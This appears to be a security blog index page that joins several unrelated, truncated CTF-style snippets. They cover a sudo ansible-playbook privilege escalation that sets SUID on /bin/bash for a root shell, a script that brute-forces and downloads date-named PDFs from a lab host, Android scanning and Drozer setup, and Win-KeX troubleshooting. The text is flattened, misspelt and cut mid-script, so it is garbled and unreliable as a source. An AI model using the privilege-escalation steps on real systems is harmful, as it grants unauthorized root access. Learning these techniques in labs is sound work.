Steinz Security

    Abusing ansible-playbook run.yml file #consider ansible-playbook is running as a cron jon /usr/bin/ansible-playbook /opt/backups/playbook/run.yml   Abusing (ALL) NOPASSWD: /usr/bin/ansible-playbook * Create a new get_root.yml file - hosts: localhost tasks: - name: test command: "chmod +s /bin/bash" udo ansible-playbook get_root.yml /bin/bash -p

    here we are looking for files whose names are in the form of 2020-01-01-upload.pdf below script was taken from github Python Script to Create and acess Filenames in the form of Date #!/usr/bin/python3 import requests import os url = 'http://10.10.10.10/documents/' for i in range ( 2020 , 2022 ): for j in range ( 1 , 13 ): for k in range ( 1 , 31 ):                               #File name date = f' { i } - { j :02 } - { k :02 } -upload.pdf' r = requests . get ( url + date ) #print (r.text) if ( r . status_code == 200 ): print ( date ) #text = r.text os . system ( 'mkdir pdf' ) os . system ( f'wget { url } { date } -O pdf/ { date } ' ) Using Exif to find the Author of the files #!/usr/bin/python3 from pwn import * io = process ( '/bin/sh' ) io . sendline ( 'ls -al pdf/' ) lst = io . recvrepeat ( 1 ). d...

    git clone https://github.com/yonjar/fixgz.git cd fizgz g++ fixgz.cpp -o fixgz ./fixgz /fixgz db.gz db_fixed.gz  

  If you want to change the user owning this file or directory (folder), you will have to use the command   chown . For instance, if you run sudo chown username: myfolder the user owning myfolder will be username. Then you can execute sudo chmod u+w myfolder to add the write permission to the username user. But if you want to add this user to the group associated with "myfolder", you can run sudo usermod -a -G groupname username and then execute sudo chmod g+w myfolder to add the write permission to the group.

Port Scan on Android as many random ports can be open on Android devices, its always better to scan all the ports using   https://github.com/RustScan/RustScan/releases download the debian package dpkg -i filename rustscan -a 10.10.10.247 now scan all the open ports with nmap -sC -sV to run default script and for version scan. Installing ADB sudo apt-get install android-tools-adb Setting up Drozer #Installing drozer on docker docker pull withsecurelabs/drozer #Downlaod the drozer Agent and install it on android download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0 #Drag and drop on emulator or install via adb adb install drozer-agent.apk #on Windows setup port forwarding for emulator adb forward tcp:31415 tcp:31415 #Get a docker shell docker run --net host -it --entrypoint sh withsecurelabs/drozer #inside the container, start drozer drozer console connect --server host.docker.internal # Method - II #Find the IP Address in about #Connect the Andro...

  In the log, it’s the last lines in /tmp/win kexsl_user.log: winMultiWindowXMsgProc - Fatal error 1 on xcb connection winClipboardIOErrorHandler! winClipboardProc - setjmp returned for IO Error Handler. (II) Server terminated successfully (0). Closing log file. here you can try to start Win-KeX with sudo: sudo kex --sl --wtstart -s A solution also brought the deletion of the logs under /tmp. sudo rm -f /tmp/*.log And stop the KeX server with the –stop and –kill option. sudo kex --stop sudo kex --kill After that, the start of kex as a normal user became possible. kex --sl --wtstart -s Also, a Win-KeX reinstallation can fix the error: sudo kex --stop sudo kex --kill sudo apt-get purge kali-win-kex sudo apt-get install kali-win-kex sudo apt-get install dbus-x11